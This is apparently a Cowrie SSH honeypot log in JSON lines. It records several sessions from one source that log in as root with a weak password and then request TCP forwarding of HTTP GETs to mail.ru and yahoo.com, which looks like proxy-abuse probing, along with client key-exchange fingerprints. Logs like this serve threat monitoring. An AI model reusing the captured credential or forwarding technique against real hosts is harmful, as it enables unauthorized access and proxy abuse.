{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:03.023058Z","src_ip":"77.83.207.83","session":"3d0bfd20fa07"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":6701,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6701","sensor":"my-vps","timestamp":"2025-08-31T03:51:03.164497Z","session":"3d0bfd20fa07"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:03.214929Z","src_ip":"77.83.207.83","session":"3d0bfd20fa07"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:03.265999Z","src_ip":"77.83.207.83","session":"3d0bfd20fa07"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":20681,"dst_ip":"1.2.3.4","dst_port":22,"session":"890e641b755c","protocol":"ssh","message":"New connection: 77.83.207.83:20681 (1.2.3.4:22) [session: 890e641b755c]","sensor":"my-vps","timestamp":"2025-08-31T03:51:03.314878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:03.315932Z","src_ip":"77.83.207.83","session":"890e641b755c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:03.366539Z","src_ip":"77.83.207.83","session":"890e641b755c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:03.617876Z","src_ip":"77.83.207.83","session":"890e641b755c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":26069,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:26069","sensor":"my-vps","timestamp":"2025-08-31T03:51:03.669315Z","session":"890e641b755c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:03.719923Z","src_ip":"77.83.207.83","session":"890e641b755c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":3476,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:3476","sensor":"my-vps","timestamp":"2025-08-31T03:51:03.865177Z","session":"890e641b755c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:03.915950Z","src_ip":"77.83.207.83","session":"890e641b755c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":7487,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7487","sensor":"my-vps","timestamp":"2025-08-31T03:51:04.060731Z","session":"890e641b755c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:04.111479Z","src_ip":"77.83.207.83","session":"890e641b755c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:04.162819Z","src_ip":"77.83.207.83","session":"890e641b755c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":20810,"dst_ip":"1.2.3.4","dst_port":22,"session":"56222ed7b8d2","protocol":"ssh","message":"New connection: 77.83.207.83:20810 (1.2.3.4:22) [session: 56222ed7b8d2]","sensor":"my-vps","timestamp":"2025-08-31T03:51:04.213051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:04.222778Z","src_ip":"77.83.207.83","session":"56222ed7b8d2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:04.263785Z","src_ip":"77.83.207.83","session":"56222ed7b8d2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:04.515326Z","src_ip":"77.83.207.83","session":"56222ed7b8d2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":31903,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:31903","sensor":"my-vps","timestamp":"2025-08-31T03:51:04.567789Z","session":"56222ed7b8d2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:04.618801Z","src_ip":"77.83.207.83","session":"56222ed7b8d2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":22656,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:22656","sensor":"my-vps","timestamp":"2025-08-31T03:51:04.760683Z","session":"56222ed7b8d2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:04.811150Z","src_ip":"77.83.207.83","session":"56222ed7b8d2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":8592,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:8592","sensor":"my-vps","timestamp":"2025-08-31T03:51:04.952905Z","session":"56222ed7b8d2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.003604Z","src_ip":"77.83.207.83","session":"56222ed7b8d2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.055216Z","src_ip":"77.83.207.83","session":"56222ed7b8d2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":20924,"dst_ip":"1.2.3.4","dst_port":22,"session":"113790b42338","protocol":"ssh","message":"New connection: 77.83.207.83:20924 (1.2.3.4:22) [session: 113790b42338]","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.105586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.106710Z","src_ip":"77.83.207.83","session":"113790b42338"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.158009Z","src_ip":"77.83.207.83","session":"113790b42338"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47500,"dst_ip":"1.2.3.4","dst_port":22,"session":"32cf0977b18b","protocol":"ssh","message":"New connection: 212.227.125.160:47500 (1.2.3.4:22) [session: 32cf0977b18b]","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.274137Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.413372Z","src_ip":"77.83.207.83","session":"113790b42338"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":14080,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:14080","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.465436Z","session":"113790b42338"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.516706Z","src_ip":"77.83.207.83","session":"113790b42338"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":17205,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:17205","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.661206Z","session":"113790b42338"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.712248Z","src_ip":"77.83.207.83","session":"113790b42338"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.751420Z","src_ip":"212.227.125.160","session":"32cf0977b18b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.752239Z","src_ip":"212.227.125.160","session":"32cf0977b18b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":17174,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:17174","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.857461Z","session":"113790b42338"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.908700Z","src_ip":"77.83.207.83","session":"113790b42338"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:05.960814Z","src_ip":"77.83.207.83","session":"113790b42338"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":21032,"dst_ip":"1.2.3.4","dst_port":22,"session":"c362d89cfbd9","protocol":"ssh","message":"New connection: 77.83.207.83:21032 (1.2.3.4:22) [session: c362d89cfbd9]","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.009759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.019330Z","src_ip":"77.83.207.83","session":"c362d89cfbd9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.060809Z","src_ip":"77.83.207.83","session":"c362d89cfbd9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.310631Z","src_ip":"77.83.207.83","session":"c362d89cfbd9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13498,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:13498","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.361619Z","session":"c362d89cfbd9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.411956Z","src_ip":"77.83.207.83","session":"c362d89cfbd9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4219,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:4219","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.552531Z","session":"c362d89cfbd9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.602542Z","src_ip":"77.83.207.83","session":"c362d89cfbd9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":1985,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:1985","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.744496Z","session":"c362d89cfbd9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.794740Z","src_ip":"77.83.207.83","session":"c362d89cfbd9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.846167Z","src_ip":"77.83.207.83","session":"c362d89cfbd9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":21129,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3187f155d85","protocol":"ssh","message":"New connection: 77.83.207.83:21129 (1.2.3.4:22) [session: d3187f155d85]","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.895206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:06.896093Z","src_ip":"77.83.207.83","session":"d3187f155d85"}
